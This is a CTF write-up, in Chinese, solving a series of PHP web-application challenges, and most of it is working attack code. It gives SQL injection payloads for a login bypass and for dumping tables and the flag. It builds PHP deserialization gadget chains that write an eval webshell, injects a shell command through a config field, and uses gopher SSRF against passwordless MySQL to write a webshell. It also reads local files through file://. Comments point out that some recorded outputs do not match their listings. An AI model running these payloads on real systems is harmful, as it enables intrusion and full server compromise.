题目环境,用Seay自动审计了一下,啥也没找出来
自己来,找到一处SQL注入没有任何过滤
payload
userid=1' union select 1#&userpwd=1
/**
 * Derives the stored credential value for $str (despite its name it does
 * not decode anything).
 *
 * Construction: md5( md5($str . md5(base64_encode('sds'))) . 'sds' ), i.e.
 * a fixed-salt, unsalted-per-user double MD5. The writeup reproduces it only
 * to compute the value the application expects. Defensive note: a fixed-salt
 * MD5 construction is not a password hash; password_hash()/password_verify()
 * is the appropriate replacement on the application side.
 *
 * @param string $str raw input value
 * @return string 32-character lowercase hex digest
 */
function sds_decode($str)
{
    $fixedSalt = md5(base64_encode('sds'));
    $inner = md5($str . $fixedSalt);
    return md5($inner . 'sds');
}
// Print the derived value for the input '1'; the digest recorded below is the
// value the writeup then uses.
print sds_decode('1');
//d9c77c4e454869d5d8da3b4be79694d3
payload
userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#&userpwd=1
Seay扫到注入点,这次直接admin\admin
就可以登录了
可以新增,
payload
dpt_name=1',sds_address =(select database())#
dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#
dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name="sds_fl9g")#
dpt_name=1',sds_address =(select flag from sds_fl9g)#
新增全局WAF
/**
 * Character-blocklist check the challenge added as a "global WAF".
 *
 * Returns 1 when $str contains any ASCII letter, digit or hyphen
 * (case-insensitive), 0 when it contains none of them, and false if PCRE
 * fails. A regex on characters is not an injection control: the writeup
 * shows the same injection still works after it was added. Parameterized
 * queries are the fix, not input filtering.
 *
 * @param string $str value to inspect
 * @return int|false
 */
function sds_waf($str)
{
    $pattern = '/[0-9]|[a-z]|-/i';
    $matched = preg_match($pattern, $str);
    return $matched;
}
额,用之前的方法也还是可以拿到flag
dpt_name=1',sds_address =(select flag from sds_flaag)#
Seay扫到存在写文件,还存在反序列化
构造序列化链,写一句话马
/**
 * Holder whose destructor writes $password into the file named by $username.
 *
 * __destruct() runs for every instance, including one materialized by
 * unserialize(); with untrusted serialized input both properties are
 * therefore attacker-controlled arguments to file_put_contents(). On the
 * application side the mitigation is to not unserialize() untrusted data
 * (use json_decode), or at least pass allowed_classes and keep file I/O out
 * of magic methods.
 */
class user
{
    public $username;
    public $password;

    /**
     * @param string $u file path written on destruction
     * @param string $p file body written on destruction
     */
    public function __construct($u, $p)
    {
        $this->username = $u;
        $this->password = $p;
    }

    public function __destruct()
    {
        $target = $this->username;
        $body = $this->password;
        file_put_contents($target, $body);
    }
}
echo urlencode(serialize(new user('1.php','')));
//O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D
/**
 * Holder that owns a log instance and closes it on destruction.
 *
 * The private property is restored by unserialize() like any other, so a
 * deserialized instance calls close() on whatever log object the input
 * described. Destructors that forward to other objects are the usual
 * starting point of a gadget chain; applications should not unserialize()
 * untrusted input at all.
 */
class dao
{
    /** @var log */
    private $conn;

    public function __construct()
    {
        $handle = new log();
        $this->conn = $handle;
    }

    public function __destruct()
    {
        $handle = $this->conn;
        $handle->close();
    }
}
/**
 * Minimal "log" whose close() writes $info into the file named by $title.
 *
 * Both properties are public and have no validation, so an instance rebuilt
 * from untrusted serialized data chooses the path and content of the write.
 * Defensive fix: restrict the path to a fixed directory and do not reach this
 * method from a destructor of deserialized objects.
 */
class log
{
    public $title = '1.php';
    public $info = '';

    public function close()
    {
        $path = $this->title;
        $content = $this->info;
        file_put_contents($path, $content);
    }
}
// Serialize the dao holder and base64-encode it. The log::$info default in
// the listing is empty, while the recorded output below carries a 24-byte
// info field, so it was not generated from this exact listing.
$blob = serialize(new dao());
print base64_encode($blob);
//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319
很明显了,只需要利用 $this->config->cache_dir 就可以写马了
/**
 * Config holder with a single public cache_dir value.
 *
 * The writeup states this property is interpolated into a shell command by
 * the application; the value here contains shell metacharacters. Any path
 * that reaches a shell must be passed through escapeshellarg() (or the shell
 * avoided with array-form proc_open), and it should never originate from
 * deserialized input.
 */
class config
{
    public $cache_dir = ";echo \"\" >1.php;";
}
/**
 * Holder whose only state is a config instance.
 *
 * The private config property is restored verbatim by unserialize(), so on
 * the application side its fields (cache_dir here) are attacker-controlled
 * whenever the serialized input is untrusted.
 */
class dao
{
    /** @var config */
    private $config;

    public function __construct()
    {
        $cfg = new config();
        $this->config = $cfg;
    }
}
// Serialize the dao holder and base64-encode it. The config::$cache_dir in
// the listing is 17 bytes, while the recorded output below carries a 41-byte
// cache_dir, so it was not generated from this exact listing.
$blob = serialize(new dao());
print base64_encode($blob);
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDE6IjtlY2hvICI8P3BocCBldmFsKFwkX1BPU1RbMV0pPz4iID4gMS5waHA7Ijt9fQ==
还是从login.php这里的反序列化开始找链子
很显然就是要去利用$update_url带到checkUpdate
去打SSRF,MySQL没密码
/**
 * Config holder whose update_url is a gopher:// URL to the local MySQL port.
 *
 * The writeup states update_url is fetched by the application's checkUpdate()
 * and that MySQL ran without a password, which is what makes the fetch
 * reach the database. Defensive fixes on the application side: allowlist the
 * URL scheme (http/https only) and the host before fetching, never take a
 * fetch target from deserialized state, and do not run the database with an
 * empty password. The literal is kept byte-for-byte.
 */
class config
{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%33%36%30%5d%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
/**
 * Holder whose only state is a config instance.
 *
 * The private config property is restored verbatim by unserialize(); the
 * writeup relies on its update_url reaching the application's checkUpdate().
 * Fetch targets should never come from deserialized input.
 */
class dao
{
    /** @var config */
    private $config;

    public function __construct()
    {
        $cfg = new config();
        $this->config = $cfg;
    }
}
// Build the dao holder, serialize it and base64-encode the result.
$a = new dao();
$encoded = base64_encode(serialize($a));
print $encoded;
这次MySQL有密码,猜测不是redis就是fastcgi了,一样的
这次如果还是按照上一题的方法打fastcgi传一句话马
会发现可以传成功,但是用蚁剑去连读不到flag,很奇怪不知道为什么
看了眼大佬的方法,是去读nginx.conf,这个配置文件
/**
 * Config holder whose update_url points at a local file via the file://
 * scheme.
 *
 * The writeup uses it to have checkUpdate() read nginx.conf. A fetcher that
 * accepts arbitrary schemes turns an outbound "update check" into a local
 * file read; allowlisting http/https is the mitigation.
 */
class config
{
    public $update_url = 'file:///etc/nginx/nginx.conf';
}
/**
 * Holder whose only state is a config instance.
 *
 * Restored verbatim by unserialize(); the config's update_url is what the
 * writeup says reaches checkUpdate(). Fetch targets should not come from
 * deserialized input.
 */
class dao
{
    /** @var config */
    private $config;

    public function __construct()
    {
        $cfg = new config();
        $this->config = $cfg;
    }
}
// Serialize the dao holder and base64-encode it; the recorded output below
// matches the 28-byte file:// update_url of the config listed above.
$blob = serialize(new dao());
print base64_encode($blob);
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyODoiZmlsZTovLy9ldGMvbmdpbngvbmdpbnguY29uZiI7fX0=
/**
 * Config holder whose update_url targets a loopback HTTP service on port
 * 4476.
 *
 * Even with the scheme restricted to http, a fetcher that accepts loopback
 * or internal hosts lets callers reach services that are not exposed
 * externally; validate the resolved host as well as the scheme.
 */
class config
{
    public $update_url = 'http://127.0.0.1:4476/';
}
/**
 * Holder whose only state is a config instance.
 *
 * Restored verbatim by unserialize(); the config's update_url is what the
 * writeup says reaches checkUpdate(). Fetch targets should not come from
 * deserialized input.
 */
class dao
{
    /** @var config */
    private $config;

    public function __construct()
    {
        $cfg = new config();
        $this->config = $cfg;
    }
}
// Serialize the dao holder and base64-encode it; the recorded output below
// matches the 22-byte http:// update_url of the config listed above.
$blob = serialize(new dao());
print base64_encode($blob);
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMjoiaHR0cDovLzEyNy4wLjAuMTo0NDc2LyI7fX0=